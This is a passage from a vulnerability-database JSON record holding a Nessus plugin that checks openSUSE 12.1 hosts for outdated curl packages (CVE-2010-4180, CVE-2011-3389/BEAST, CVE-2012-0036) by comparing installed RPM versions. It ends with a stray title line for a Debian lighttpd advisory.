"2023-05-18T14:22:11", "description": "- Fix IMAP, POP3 and SMTP URL sanitization (bnc#740452, CVE-2012-0036)\n\n - Disable SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG option when built against an older OpenSSL version (CVE-2010-4180).\n\n - Don't enable SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS (bnc#742306, CVE-2011-3389).", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : curl (openSUSE-2012-76) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4180", "CVE-2011-3389", "CVE-2012-0036"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:curl", "p-cpe:/a:novell:opensuse:curl-debuginfo", "p-cpe:/a:novell:opensuse:libcurl-devel", "p-cpe:/a:novell:opensuse:libcurl4", "p-cpe:/a:novell:opensuse:libcurl4-32bit", "p-cpe:/a:novell:opensuse:libcurl4-debuginfo", "p-cpe:/a:novell:opensuse:libcurl4-debuginfo-32bit", "cpe:/o:novell:opensuse:12.1"], "id": "OPENSUSE-2012-76.NASL", "href": "https://www.tenable.com/plugins/nessus/74807", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-76.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74807);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2010-4180\", \"CVE-2011-3389\", \"CVE-2012-0036\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : curl (openSUSE-2012-76) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Fix IMAP, POP3 and SMTP URL sanitization (bnc#740452,\n CVE-2012-0036)\n\n - Disable SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG option\n when built against an older OpenSSL version\n (CVE-2010-4180).\n\n - Don't enable SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS\n (bnc#742306, CVE-2011-3389).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=740452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=742306\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected curl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"curl-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"curl-debuginfo-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libcurl-devel-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libcurl4-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libcurl4-debuginfo-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.22.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-32bit-7.22.0-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl / curl-d
Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)
